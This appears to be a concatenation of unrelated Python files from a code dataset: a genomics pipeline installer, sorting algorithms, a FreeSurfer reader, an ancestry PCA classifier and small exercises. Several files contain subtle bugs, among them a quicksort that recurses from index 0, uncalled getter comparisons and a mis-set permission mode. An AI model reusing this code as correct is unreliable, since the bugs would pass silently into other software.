# Will install necessary dependancies, set up folders and download databases
# necessay to use the pipeline.
#
# Should be run using:
#
# python setup.py ( install | update | updatedb )
#
import os
import sys
import shutil
import stat
import subprocess
def main():
# Extract argument
try:
possible_arg = ['install', 'update', 'updatedb']
task = sys.argv[1].lower()
assert task in possible_arg
except:
print '\nArgument is invalid. Command must be one of the following:'
print ' sudo python setup.py install'
print ' python setup.py update'
print ' python setup.py updatedb\n'
sys.exit()
# Ig Database URL
db_url = ('ftp://ftp.ncbi.nih.gov/blast/executables/'
'igblast/release/database/human*')
#
# Install
#
if task == 'install':
# Check for sudo access
if not os.getenv("USER") == 'root':
print ('\nSuperuser access is required to install dependancies. ' +
'Run again with:')
print ' sudo python setup.py install\n'
sys.exit()
# Write project folders
folders = ['database', 'tmp', 'results', 'comparisons']
exist = []
for folder in folders:
if os.path.exists(folder):
exist.append(folder)
if len(exist) > 0:
resp = raw_input('This will overwrite the folders containing ' +
'any existing results. Would you like to ' +
'continue? (y/n)')
if resp == 'y':
for folder in exist:
shutil.rmtree(folder)
else:
print 'Exiting.'
return 1
for folder in folders:
os.mkdir(folder)
# Change folder permissions to 777
os.chmod(folder, stat.S_IRWXO)
# Download databases
ret = subprocess.call('wget -P ./database {0}'.format(db_url),
shell=True)
if not ret == 0:
print 'Failed to download Ig databases'
return 1
# Try to install dependancies
ret = subprocess.call(' '.join([
'apt-get install',
'git',
'ncbi-blast+',
'pypy',
'python-pip']), shell=True)
if not ret == 0:
print ('Dependancies were not succesfully installed. They may ' +
'need to be installed manually.')
return 1
# Install docopt using pip
ret = subprocess.call(' '.join([
'pip install docopt==0.6.1']), shell=True)
if not ret == 0:
print ('Docopt was not succesfully installed. Exiting.')
return 1
print 'Done.'
elif task == 'update':
# Try to git pull
ret = subprocess.call('git pull', shell=True)
if not ret == 0:
ret2 = subprocess.call('git fetch --all', shell=True)
ret3 = subprocess.call('git reset --hard origin/master',shell=True)
if not ret2 == 0 and ret3 == 0:
print 'Script was unable to update pipeline.'
return 1
print '\nPipeline updated.'
elif task == 'updatedb':
ret = subprocess.call('wget -P ./database {0}'.format(db_url),
shell=True)
if not ret == 0:
print 'Failed to update Ig databases'
return 1
print 'Done'
return 0
if __name__ == '__main__':
main()
|
993,571 | 555fa2a3ff410bbf67f750d1b8f61f3b7145a71d | # Array to hold all error objects used to test code
import datetime
class Error:
def __init__(self, contract_type, date, error_code):
self.contractType = contract_type
self.date = date
self.errorCode = error_code
def get_contract_type(self):
return self.contractType
def get_date(self):
return self.date
def get_error_code(self):
return self.errorCode
# Array containing errors to be used for testing
# Errors are added below
errors = []
# Instantiating errors to add to "errors" array
# Argument list is: contract_type, date, error_code
# Contract types are long-term, medium-term, or short-term
# Error types are:
# 60.8C1
# 60.8C2
# 60.8C3
# 60.8C4
# 60.8C5
# 60.8C6
# 60.8C7
# 60.8C8
# 60.8C9
# 60.8C10
# 60.8C11
# 60.8C12
# 60.8C13
# 60.8C14
# 60.8C15
# 60.8C16
# 60.8C17
# 60.8C18
errors = [("long-term", datetime.datetime(2015, 4, 12), "60.8C1"),
(Error("long-term", datetime.datetime(2015, 5, 15), "60.8C1")),
(Error("short-term", datetime.datetime(2018, 6, 17), "60.8C2")),
(Error("short-term", datetime.datetime(2016, 7, 19), "60.8C3")),
(Error("medium-term", datetime.datetime(2017, 8, 10), "60.8C4")),
(Error("medium-term", datetime.datetime(2015, 9, 13), "60.8C5")),
(Error("long-term", datetime.datetime(2013, 1, 22), "60.8C6")),
(Error("long-term", datetime.datetime(2014, 4, 25), "60.8C7")),
(Error("short-term", datetime.datetime(2017, 3, 27), "60.8C8")),
(Error("short-term", datetime.datetime(2018, 5, 29), "60.8C9")),
(Error("short-term", datetime.datetime(2019, 6, 12), "60.8C10")),
(Error("short-term", datetime.datetime(2020, 7, 2), "60.8C11")),
(Error("medium-term", datetime.datetime(2014, 7, 4), "60.8C12")),
(Error("medium-term", datetime.datetime(2016, 3, 6), "60.8C13")),
(Error("long-term", datetime.datetime(2017, 9, 9), "60.8C14")),
(Error("short-term", datetime.datetime(2013, 10, 24), "60.8C15")),
(Error("short-term", datetime.datetime(2016, 12, 23), "60.8C16")),
(Error("medium-term", datetime.datetime(2012, 11, 14), "60.8C17")),
(Error("medium-term", datetime.datetime(2015, 2, 2), "60.8C18")),
(Error("long-term", datetime.datetime(2016, 3, 9), "60.8C1")),
(Error("long-term", datetime.datetime(2017, 4, 3), "60.8C2")),
(Error("short-term", datetime.datetime(2018, 5, 15), "60.8C3")),
(Error("short-term", datetime.datetime(2019, 6, 25), "60.8C4")),
(Error("short-term", datetime.datetime(2018, 7, 12), "60.8C5")),
(Error("short-term", datetime.datetime(2019, 8, 16), "60.8C6")),
(Error("medium-term", datetime.datetime(2020, 9, 19), "60.8C7")),
(Error("medium-term", datetime.datetime(2019, 10, 5), "60.8C8"))]
# The first method is to return error objects within a certain date range
# First argument is array of error objects
# Second argument is the start of date range
# Third argument is end of date range
# date format should be using example December 17, 2016 "datetime.datetime(2016, 17, 12)"
def get_errors_by_date(a, d1, d2):
errors_by_date = []
for x in a:
if d1 <= x.get_date() <= d2:
errors_by_date.append(x)
return errors_by_date
# This method will return all errors of a certain contract type
# Contract type should be either: "short-term", "medium-term", "long-term"
# First parameter is array of errors
# Second parameters is contract type
def get_errors_by_contract_type(a, c_type):
errors_by_contract_type = []
for x in a:
if x.get_contract_type() == c_type:
errors_by_contract_type.append(x)
return errors_by_contract_type
def get_errors_by_error_type(a, e_type):
errors_by_error_type = []
for x in a:
if x.get_error_code() == e_type:
errors_by_error_type.append(x)
return errors_by_error_type
# Returns array of errors based on error type and date
def get_errors_by_error_type_and_date(a, d1, d2, e_type):
errors_by_error_type_and_date = []
for x in a:
if (d1 <= x.get_date() <= d2) and x.get_error_code() == e_type:
errors_by_error_type_and_date.append(x)
return errors_by_error_type_and_date
# Returns array of errors based on error type and contract type
def get_errors_by_contract_type_and_error_type(a, c_type, e_type):
errors_by_contract_type_and_error_type = []
for x in a:
if x.get_contract_type == c_type and x.get_error_code() == e_type:
errors_by_contract_type_and_error_type.append(x)
return errors_by_contract_type_and_error_type
# Returns array of errors based on date and contract type
def get_errors_by_contract_type_and_date(a, d1, d2, c_type):
errors_by_contract_type_and_date = []
for x in a:
if (d1 <= x.get_date() <= d2) and x.get_contract_type == c_type:
errors_by_contract_type_and_date.append(x)
return errors_by_contract_type_and_date
# Returns array of errors based on date, error, and contract type
def get_errors_by_contract_and_error_type_and_date(a, d1, d2, c_type, e_type):
errors_all = []
for x in a:
if (d1 <= x.get_date() <= d2) and x.get_contract_type == c_type and x.get_error_code() == e_type:
errors_all.append(x)
return errors_all
# UNIT TEST def get_errors_by_date(a, d1, d2):
t1 = get_errors_by_date(errors, datetime.datetime(2015, 1, 1), datetime.datetime(2019, 1, 1))
for x in t1:
print(x)
# UNIT TEST def get_errors_by_contract_type(a, c_type):
# UNIT TEST def get_errors_by_error_type(a, e_type):
# UNIT TEST def get_errors_by_error_type_and_date(a, d1, d2, e_type):
# UNIT TEST def get_errors_by_contract_type_and_error_type(a, c_type, e_type):
# UNIT TEST def get_errors_by_contract_type_and_error_type(a, c_type, e_type):
# UNIT TEST def get_errors_by_contract_type_and_date(a, d1, d2, c_type):
# UNIT TEST def get_errors_by_contract_and_error_type_and_date(a, d1, d2, c_type, e_type):
|
993,572 | 198bf6639f423d30211d4f90bf336c5e28d7d46f | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 04 13:52:07 2018
@author: whuang67
"""
###### Bubble Sort ########################
def bubble_sort(arr):
for i in range(len(arr)-1, 0, -1):
for j in range(i):
if arr[j] > arr[j+1]:
temp = arr[j]
arr[j] = arr[j+1]
arr[j+1] = temp
###### Selection Sort ########################
def selection_sort(arr):
for i in range(len(arr)):
positionOfMin = len(arr)-1
for j in range(i, len(arr)-1):
if arr[positionOfMin] > arr[j]:
positionOfMin = j
temp = arr[i]
arr[i] = arr[positionOfMin]
arr[positionOfMin] = temp
def selection_sort2(arr):
for i in range(len(arr)-1, 0, -1):
positionOfMax = 0
for j in range(1, i+1):
if arr[positionOfMax] < arr[j]:
positionOfMax = j
temp = arr[i]
arr[i] = arr[positionOfMax]
arr[positionOfMax] = temp
###### Insertion Sort ########################
def insertion_sort(arr):
for i in range(1, len(arr)):
currentValue = arr[i]
position = i
while position > 0 and arr[position-1] > currentValue:
arr[position] = arr[position-1]
position -= 1
arr[position] = currentValue
###### Shell Sort ########################
def shell_sort(arr):
sublistcount = len(arr)/2
while sublistcount > 0:
for start in range(sublistcount):
gap_insertion_sort(arr, start, sublistcount)
sublistcount = sublistcount/2
def gap_insertion_sort(arr, start, gap):
for i in range(start+gap, len(arr), gap):
currentValue = arr[i]
position = i
while position >= gap and arr[position-gap] > arr[position]:
arr[position] = arr[position-gap]
position -= gap
arr[position] = currentValue
###### Merge Sort ########################
def merge_sort(arr):
if len(arr) > 1:
mid = len(arr)//2
lefthalf = arr[:mid]
righthalf = arr[mid:]
merge_sort(lefthalf)
merge_sort(righthalf)
i = 0; j = 0; k = 0
while i < len(lefthalf) and j < len(righthalf):
if lefthalf[i] < righthalf[j]:
arr[k] = lefthalf[i]
i += 1
else:
arr[k] = righthalf[j]
j += 1
k += 1
while i < len(lefthalf):
arr[k] = lefthalf[i]
i += 1
k += 1
while j < len(righthalf):
arr[k] = righthalf[j]
j += 1
k += 1
print(arr)
###### Quick Sort ########################
def quick_sort(arr):
quick_sort_help(arr, 0, len(arr)-1)
def quick_sort_help(arr, first, last):
if first < last:
splitpoint = partition(arr, first, last)
quick_sort_help(arr, 0, splitpoint-1)
quick_sort_help(arr, splitpoint+1, last)
def partition(arr, first, last):
pivotvalue = arr[first]
leftmark = first+1
rightmark = last
done = False
while not done:
while leftmark <= rightmark and arr[leftmark] <= pivotvalue:
leftmark += 1
while arr[rightmark] >= pivotvalue and rightmark >= leftmark:
rightmark -= 1
if rightmark < leftmark:
done = True
else:
temp = arr[leftmark]
arr[leftmark] = arr[rightmark]
arr[rightmark] = temp
temp = arr[first]
arr[first] = arr[rightmark]
arr[rightmark] = temp
return rightmark
if __name__ == "__main__":
###### Bubble Sort ######
arr = [5, 3, 7, 2]
bubble_sort(arr)
print(arr)
###### Selection Sort ######
arr2 = [5, 3, 7, 2]
selection_sort2(arr2)
print(arr2)
arr3 = [5, 3, 7, 2]
selection_sort2(arr3)
print(arr3)
###### Insertation Sort ######
arr4 = [3, 5, 4, 6, 8, 1, 2, 12, 41, 25]
insertion_sort(arr4)
print(arr4)
###### Shell Sort ######
arr5 = [3, 5, 4, 6, 8, 1, 2, 12, 41, 25]
shell_sort(arr5)
print(arr5)
###### Merge Sort ######
arr6 = [11,2,5,4,7,56,2,23]
merge_sort(arr6)
print(arr6)
|
993,573 | e3c858e6806156560592d6cf7ad84af932c79d91 | """
Read hippocampal subfield volumes computed by Freesurfer and/or ASHS
https://sites.google.com/site/hipposubfields/home
https://surfer.nmr.mgh.harvard.edu/fswiki/HippocampalSubfields
>>> from freesurfer_volume_reader import ashs, freesurfer
>>>
>>> for volume_file in itertools.chain(
>>> ashs.HippocampalSubfieldsVolumeFile.find('/my/ashs/subjects'),
>>> freesurfer.HippocampalSubfieldsVolumeFile.find('/my/freesurfer/subjects')):
>>> print(volume_file.absolute_path)
>>> print(volume_file.subject, volume_file.hemisphere)
>>> print(volume_file.read_volumes_mm3())
>>> print(volume_file.read_volumes_dataframe())
"""
import abc
import os
import pathlib
import re
import typing
import warnings
import pandas
try:
from freesurfer_volume_reader.version import __version__
except ImportError: # pragma: no cover
__version__ = None
def parse_version_string(
version_string: str,
) -> typing.Tuple[typing.Union[int, str], ...]:
warnings.warn( # previously used in `__main__.concat_dataframes`
"function `parse_version_string` is deprecated"
)
return tuple(int(p) if p.isdigit() else p for p in version_string.split("."))
def remove_group_names_from_regex(regex_pattern: str) -> str:
return re.sub(r"\?P<.+?>", "", regex_pattern)
class VolumeFile(metaclass=abc.ABCMeta):
FILENAME_REGEX: typing.Pattern[str] = NotImplemented
@abc.abstractmethod
def __init__(self, path: str) -> None:
self._absolute_path = pathlib.Path(path).absolute()
@property
def absolute_path(self) -> str:
return str(self._absolute_path)
@classmethod
def find(
cls, root_dir_path: str, filename_regex: typing.Optional[typing.Pattern] = None
) -> typing.Iterator["VolumeFile"]:
if filename_regex is None:
filename_regex = cls.FILENAME_REGEX
for dirpath, _, filenames in os.walk(root_dir_path):
for filename in filter(filename_regex.search, filenames):
yield cls(path=os.path.join(dirpath, filename))
class SubfieldVolumeFile(VolumeFile):
@abc.abstractmethod
def read_volumes_mm3(self) -> typing.Dict[str, float]:
raise NotImplementedError()
@abc.abstractmethod
def read_volumes_dataframe(self) -> pandas.DataFrame:
raise NotImplementedError()
def _read_volume_series(self) -> pandas.Series:
subfield_volumes = self.read_volumes_mm3()
return pandas.Series(
data=list(subfield_volumes.values()),
name="volume_mm^3",
index=pandas.Index(data=subfield_volumes.keys(), name="subfield"),
)
|
993,574 | 2d9c0ddf86ca793636fe91b2d31fa6726f890f74 | #!/usr/bin/env python
# test is one way to improve quality.
# Perform operation test with small function unit.
# It is better to join parts that passed test.
# assert can be used to determine bool value.
assert(True)
#assert(False)
# error occurs if argument of assert function is false. follow it.
# AssertionError
# character output can also be made by test.
assert True, 'Hello'
#assert False, 'World'
# AssertionError: World
# test with assert. follow it.
assert(5 in range(10))
#assert(11 in range(10))
#
# File "./testing.py", line 24, in <module>
# assert(11 in range(10))
# AssertionError
# testing arguments
def int_print(num):
assert(type(num) == type(5))
print(num)
int_print(3)
#int_print("number")
# File "./testing.py", line 34, in int_print
# assert(type(num) == type(5))
# AssertionError
|
993,575 | fa43b422dbae615498fe8f6331a3937191013459 | #温度转换
'''
(1) 输入输出的摄氏度采用大写字母C开头,温度可以是整数或小数,如:C12.34指摄氏度12.34度;
(2) 输入输出的华氏度采用大写字母F开头,温度可以是整数或小数,如:F87.65指华氏度87.65度;
(3) 不考虑异常输入的问题,输出保留小数点后两位;
(4) 使用input()获得测试用例输入时,不要增加提示字符串。
'''
'''TempConvert.py'''
TempStr = input()
if TempStr[0] in ['F']:
C = (eval(TempStr[1:]) - 32)/1.8
print("C{:.2f}".format(C))
elif TempStr[0] in ['C']:
F = 1.8*eval(TempStr[1:]) + 32
print("F{:.2f}".format(F))
else:
print("输入格式错误")
|
993,576 | de1994db2d0f9c63e2ad8b642dbc02f3b4be7ab4 | #!/usr/local/bin/python3
# -*- coding:utf-8 -*-
"""
@author:
@file: 1389.py
@time: 2020/4/30 10:07
@desc:
"""
class Solution(object):
def createTargetArray(self, nums, index):
"""
:type nums: List[int]
:type index: List[int]
:rtype: List[int]
"""
target = []
for i in range(len(nums)):
target.insert(index[i], nums[i])
return target
# a = Solution().createTargetArray([0,1,2,3,4],[0,1,2,2,1])
# b = Solution().createTargetArray([1,2,3,4,0],[0,1,2,3,0])
c = Solution().createTargetArray([1],[0])
# print(a)
# print(b)
print(c) |
993,577 | bf3741ee6392603f19fff22886122826ce371f3f | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-03-23 02:05
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]
operations = [
migrations.CreateModel(
name="Relation",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("type", models.CharField(max_length=50)),
("base_word", models.CharField(max_length=50)),
("input_word", models.CharField(max_length=50)),
("word_net_score", models.FloatField()),
("model_score", models.FloatField()),
],
),
migrations.CreateModel(
name="UserInput",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("round_number", models.IntegerField()),
("round_time", models.IntegerField()),
("word_score", models.FloatField()),
("challenge", models.BooleanField()),
(
"relation",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="NLP4CCB.Relation",
),
),
(
"user",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
),
migrations.CreateModel(
name="UserStats",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("rounds_played", models.IntegerField()),
("total_score", models.FloatField()),
(
"user",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
unique=True,
),
),
],
),
]
|
993,578 | 8dcbb99020cadb6e6fbdff3a7a7007b0dad61ca9 | from alignChannels import alignChannels
import numpy as np
from PIL import Image
# Problem 1: Image Alignment
# 1. Load images (all 3 channels)
red = np.load('red.npy')
green = np.load('green.npy')
blue = np.load('blue.npy')
def ncc(array1,array2): #NCC based alignment
flat_arr1 = array1.flatten()
flat_arr2 = array2.flatten()
norm_arr1 = np.linalg.norm(flat_arr1)
norm_arr2 = np.linalg.norm(flat_arr2)
prod_array = flat_arr1 * flat_arr2
sum_prod_array = sum(prod_array)
NCC = sum_prod_array/(norm_arr1*norm_arr2)
return NCC
ncc_blue_red_col = []
ncc_blue_green_col = []
ncc_blue_red_row = []
ncc_blue_green_row = []
red_updated = []
green_updated = []
red_col = []
red_row = []
green_col = []
green_row = []
for i in range(0,61):
ncc_val_red = ncc(np.roll(red,i-30,axis=1),blue)
ncc_val_green = ncc(np.roll(green,i-30,axis=1),blue)
ncc_blue_red_col.append(ncc_val_red)
ncc_blue_green_col.append(ncc_val_green)
red_col = np.roll(red,np.argmax(ncc_blue_red_col)-30,axis=1)
green_col = np.roll(green,np.argmax(ncc_blue_green_col)-30,axis=1)
for i in range(0,61):
ncc_val_red = ncc(np.roll(red,i-30,axis=0),blue)
ncc_val_green = ncc(np.roll(green,i-30,axis=0),blue)
ncc_blue_red_row.append(ncc_val_red)
ncc_blue_green_row.append(ncc_val_green)
red_row = np.roll(red,np.argmax(ncc_blue_red_row)-30,axis=0)
green_row = np.roll(green,np.argmax(ncc_blue_green_row)-30,axis=0)
red_updated = red_row
green_updated = green_row
if max(ncc_blue_red_col)>max(ncc_blue_red_row):
red_updated = red_col
if max(ncc_blue_green_col)>max(ncc_blue_green_row):
green_updated = green_col
# 2. Find best alignment
rgbResult = alignChannels(blue,red_updated,green_updated)
# 3. save result to rgb_output.jpg (IN THE "results" FOLDER)
img = Image.fromarray(rgbResult)
img.save('hello.jpg')
|
993,579 | cf6eaad8b31dc7ec3b4213568efa629b44176c97 | # Operator Overloading in Python ...!
# Behind the seen in Python
# print(f"Addition : {10+20}")
# # --or--
# print(f"Addition : {int.__add__(10, 20)}")
#
# print(f"Result : {'Santanu' + ' Banik'}")
# # --or--
# print(f"Result : {str.__add__('Santanu', ' Banik')}")
class OverloadOperator:
def __init__(self, arg):
self.Data = arg
# adding two objects ...
def __add__(self, other):
return self.Data + other.Data
obj00 = OverloadOperator(100)
obj01 = OverloadOperator(200)
print(obj00 + obj01)
strObj00 = OverloadOperator("Santanu ")
strObj01 = OverloadOperator("Banik")
print(strObj00 + strObj01)
##########################################
class complex:
def __init__(self, arg00, arg01):
self.arg00 = arg00
self.arg01 = arg01
# adding two objects ...
# Overload '+' Operator
def __add__(self, other):
return self.arg00 + other.arg00, self.arg01 + other.arg01
def __str__(self):
return self.arg00, self.arg01
object00 = complex(10, 20)
object01 = complex(50, 60)
result = object00 + object01
# Behind the seen....in python ....
#
# object00 = complex(10, 20) ==> object00.arg00 = 10
# object00.arg01 = 20
#____________________________________________________
# object01 = complex(50, 60) ==> object01.arg00 = 50
# object01.arg01 = 60
#____________________________________________________
# object00 + object01 ==> __add__(object00, object01):
# return (object00.arg00 + object01.arg00, object00.arg01 + object01.arg01)
# [(10 + 50), (20 + 60)] ==> (60, 80)
print(f"Result : {result}")
obj00 = complex("A", "B")
# obj00 = complex("A", "B") ==> obj00.arg00 = "A"
# obj00.arg01 = "B"
obj01 = complex("Z", "Y")
# obj01 = complex("Z", "Y") ==> obj01.arg00 = "Z"
# obj01.arg01 = "Y"
result00 = obj00 + obj01
print(f"Result : {result00}") |
993,580 | 045a474868c5fa81e47f503ca445706a364a2b99 | import logging
import os
import re
import yaml
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from sklearn.decomposition import PCA
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, OneHotEncoder
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)
def get_ancestry_to_color(ancestries):
colors = ['red', 'blue', 'green', 'orange', 'purple', 'gray', 'black', 'pink', 'brown']
ancestry_to_color = {}
for i, k in enumerate(ancestries):
color_index = i % len(colors)
ancestry_to_color[k] = colors[color_index]
return ancestry_to_color
def get_ancestry_vcf_df(vcf_fp, stop_on='#CHROM', keep_only=None):
f = open(vcf_fp)
line = ''
header = ''
while True:
line = f.readline()
if line[:6] == stop_on:
break
columns = line[1:].strip().replace('""', '').split('\t')[9:]
index_data_tups = []
already_seen = set()
for i, line in enumerate(f):
pieces = line.strip().split('\t')
r_id = pieces[0] + ':' + pieces[1] + ':' + pieces[3] + ':' + pieces[4]
if r_id not in already_seen:
already_seen.add(r_id)
index_data_tups.append((r_id, pieces[9:]))
index_data_tups = sorted(index_data_tups, key=lambda x: x[0])
index_data_tups = [(i, ls) for i, ls in index_data_tups
if ':X:' not in i and ':chrX:' not in i]
index, data = zip(*index_data_tups)
data = np.asarray(data)
df = pd.DataFrame(data=data, columns=columns, index=index)
df.index.name = ''
# transpose dataframe so samples are rows, mutations are columns
df = df.transpose()
# replace phased calls
# df = df.replace(re.compile(r'^1\|0'), '0|1')
sample_ids = list(df.index)
f.close()
return df, sample_ids
def get_ancestry_map(map_fp, super_population=True):
f = open(map_fp)
# dump header
f.readline()
ancestry_map = {}
for line in f:
if super_population:
sample_id, _, ancestry, _ = line.strip().split('\t')
else:
sample_id, ancestry, _, _ = line.strip().split('\t')
ancestry_map[sample_id] = ancestry
return ancestry_map
def get_columns_to_drop(df, max_missingness=.05):
to_drop = []
for i, c in enumerate(df.columns):
missing_count = len([x for x in df[c] if x == '.|.'])
if missing_count / df.shape[0] > .05:
to_drop.append(c)
return to_drop
def create_dfs(thousand_genomes_vcf_fp, sample_vcf_fp, stats_dict=None):
sample_df, sample_ids = get_ancestry_vcf_df(sample_vcf_fp)
thousand_genomes_df, thousand_genomes_sample_ids = get_ancestry_vcf_df(thousand_genomes_vcf_fp,
keep_only=sample_df.columns)
if list(sample_df.columns) != list(thousand_genomes_df.columns):
logging.warning(f'sample dataframe and thousand genomes dataframe do not have the same\
variants: sample_df-{sample_df.shape}, thousand_genomes_df-{thousand_genomes_df.shape}. \
trimming down.')
thousand_genomes_df = thousand_genomes_df[sample_df.columns]
logging.info(f'new thousand genomes shape is {thousand_genomes_df.shape}')
# raise RuntimeError(f'sample dataframe and thousand genomes dataframe do not have the same\
# variants: sample_df-{sample_df.shape}, thousand_genomes_df-{thousand_genomes_df.shape}')
if stats_dict is not None:
stats_dict['inputs_before_drop'] = {
'thousand_genomes_num_samples': thousand_genomes_df.shape[0],
'thousand_genomes_num_variants': thousand_genomes_df.shape[1],
'run_num_samples': sample_df.shape[0],
'run_num_variants': sample_df.shape[1]
}
to_drop = get_columns_to_drop(sample_df, max_missingness=.05)
if stats_dict is not None:
stats_dict['percent_of_variants_dropped'] = len(to_drop) / sample_df.shape[1]
stats_dict['num_variants_dropped'] = len(to_drop)
thousand_genomes_df = thousand_genomes_df.drop(to_drop, axis=1)
sample_df = sample_df.drop(to_drop, axis=1)
if stats_dict is not None:
stats_dict['inputs_after_drop'] = {
'thousand_genomes_num_samples': thousand_genomes_df.shape[0],
'thousand_genomes_num_variants': thousand_genomes_df.shape[1],
'run_num_samples': sample_df.shape[0],
'run_num_variants': sample_df.shape[1]
}
return thousand_genomes_df, sample_df
def create_target_df(thousand_genomes_df, thousand_genomes_panel_fp, return_map=True,
super_population=True):
# read in ancestries for samples
sample_id_to_ancestry = get_ancestry_map(thousand_genomes_panel_fp,
super_population=super_population)
# grab our target variable
ancestries = [sample_id_to_ancestry[sample_id] for sample_id in thousand_genomes_df.index]
target_df = pd.DataFrame.from_dict({
'ancestry': ancestries
})
target_df.index = thousand_genomes_df.index
return target_df, sample_id_to_ancestry
def plot_components(pcs, sample_ids, sample_id_to_ancestry, n=5,
prefix='output', output_dir=os.getcwd()):
labels = [f'PC{i}' for i in range(1, n + 1)]
plotting_df = pd.DataFrame(data=pcs[:, :n], columns=labels)
ancestry_to_color = get_ancestry_to_color(set(list(sample_id_to_ancestry.values())))
colors = [ancestry_to_color[sample_id_to_ancestry[s_id]]
for s_id in sample_ids]
axs = pd.plotting.scatter_matrix(plotting_df, color=colors,
figsize=(12,12), diagonal='kde')
for subaxis in axs:
for ax in subaxis:
ax.xaxis.set_ticks([])
ax.yaxis.set_ticks([])
plt.savefig(os.path.join(output_dir, f'{prefix}.pdf'), dpi=300, figsize=(12,12))
plt.savefig(os.path.join(output_dir, f'{prefix}.png'), dpi=300, figsize=(12,12))
def write_predictions_file(output_fp, sample_ids, predictions, probs, classes):
out_f = open(output_fp, 'w')
labels = ['probability_' + c for c in classes]
out_f.write('sample_id\tpredicted_ancestry\t' + '\t'.join(labels) + '\n')
for s_id, prediction, probabilities in zip(sample_ids, predictions, probs):
out_f.write(f'{s_id}\t{prediction}\t' + '\t'.join([str(x)
for x in probabilities]) + '\n')
out_f.close()
def write_principle_components_file(sample_ids, pcs, output_fp):
f = open(output_fp, 'w')
for sample_id, vals in zip(sample_ids, pcs):
f.write(sample_id + '\t' + '\t'.join([str(x) for x in vals]) + '\n')
f.close()
def run_model(thousand_genomes_df, sample_df, target_df, sample_id_to_ancestry,
test_size=.2, stats_dict=None, num_components=20, output_dir=os.getcwd()):
X_train_df, X_test_df, y_train_df, y_test_df = train_test_split(
thousand_genomes_df, target_df, test_size=test_size)
if stats_dict is not None:
stats_dict['model'] = {'test_split': test_size, 'num_pca_components': num_components}
X_train, X_test = X_train_df.values, X_test_df.values
y_train, y_test = (np.reshape(y_train_df.values, (y_train_df.shape[0],)),
np.reshape(y_test_df.values, (y_test_df.shape[0],)))
# create one hot encoder
genotype_encoder = OneHotEncoder(handle_unknown='ignore', sparse=False)
genotype_encoder.fit(X_train)
# actually transform
X_train = genotype_encoder.transform(X_train)
# do pca
pca = PCA(n_components=num_components)
pca.fit(X_train)
X_train_pcs = pca.transform(X_train)
# write your thousand genomes training pcs file
write_principle_components_file(X_train_df.index, X_train_pcs, os.path.join(output_dir, 'thousand_genomes.training.pcs'))
#plot_components(X_train_pcs, X_train_df.index, sample_id_to_ancestry, n=5, prefix='pc.thousand_genomes.training',
# output_dir=output_dir)
# train random forest model
scaler = StandardScaler()
scaler.fit(X_train_pcs)
X_train_pcs = scaler.transform(X_train_pcs)
clf = RandomForestClassifier(n_estimators=100)
clf.fit(X_train_pcs, y_train)
score = clf.score(X_train_pcs, y_train)
if stats_dict is not None:
stats_dict['model']['training_score'] = float(score)
# test our new model
X_test = genotype_encoder.transform(X_test)
X_test_pcs = pca.transform(X_test)
# write your thousand genomes test pcs file
write_principle_components_file(X_test_df.index, X_test_pcs, os.path.join(output_dir, 'thousand_genomes.test.pcs'))
#plot_components(X_test_pcs, X_test_df.index, sample_id_to_ancestry, n=5, prefix='pc.thousand_genomes.test',
# output_dir=output_dir)
X_test_pcs = scaler.transform(X_test_pcs)
score = clf.score(X_test_pcs, y_test)
if stats_dict is not None:
stats_dict['model']['test_score'] = float(score)
# make predictions
samples_test = sample_df.values
samples_test = genotype_encoder.transform(samples_test)
X_test_pcs = pca.transform(samples_test)
# write your sample pcs file
write_principle_components_file(sample_df.index, X_test_pcs, os.path.join(output_dir, 'samples.pcs'))
X_test_pcs = scaler.transform(X_test_pcs)
predictions = clf.predict(X_test_pcs)
probs = clf.predict_proba(X_test_pcs)
classes = clf.classes_
sample_id_to_predicted_ancestry = {s_id:p for s_id, p in zip(sample_df.index, predictions)}
#plot_components(X_test_pcs, sample_df.index, sample_id_to_predicted_ancestry, n=5,
# prefix='pc.samples', output_dir=output_dir)
write_predictions_file(os.path.join(output_dir, 'predictions.tsv'),
sample_df.index, predictions, probs, classes)
if stats_dict is not None:
with open(os.path.join(output_dir, 'stats.yaml'), 'w') as outfile:
yaml.dump(stats_dict, outfile, default_flow_style=False)
def preform_ancestry_analysis(thousand_genomes_vcf_fp, sample_vcf_fp, thousand_genomes_panel_fp,
output_dir=os.getcwd()):
stats_dict = {}
thousand_genomes_df, sample_df = create_dfs(thousand_genomes_vcf_fp, sample_vcf_fp,
stats_dict=stats_dict)
target_df, sample_id_to_ancestry = create_target_df(thousand_genomes_df,
thousand_genomes_panel_fp, super_population=True)
# make population directory
super_population_dir = os.path.join(output_dir, 'super_population')
sub_population_dir = os.path.join(output_dir, 'sub_population')
if not os.path.isdir(super_population_dir):
os.mkdir(super_population_dir)
if not os.path.isdir(sub_population_dir):
os.mkdir(sub_population_dir)
run_model(thousand_genomes_df, sample_df, target_df, sample_id_to_ancestry,
test_size=.2, stats_dict=stats_dict, num_components=20, output_dir=super_population_dir)
# run for sub populations
target_df, sample_id_to_ancestry = create_target_df(thousand_genomes_df,
thousand_genomes_panel_fp, super_population=False)
run_model(thousand_genomes_df, sample_df, target_df, sample_id_to_ancestry,
test_size=.2, stats_dict=stats_dict, num_components=20, output_dir=sub_population_dir)
|
993,581 | becc961e03b9ac78178e8dab8f61075f1e99f8a0 | first_employee = int(input())
second_employee = int(input())
third_employee = int(input())
people = int(input())
total_per_employee = first_employee + second_employee + third_employee
hours = 0
while people > 0:
people -= total_per_employee
hours += 1
if hours % 4 == 0:
hours += 1
print(f"Time needed: {hours}h.") |
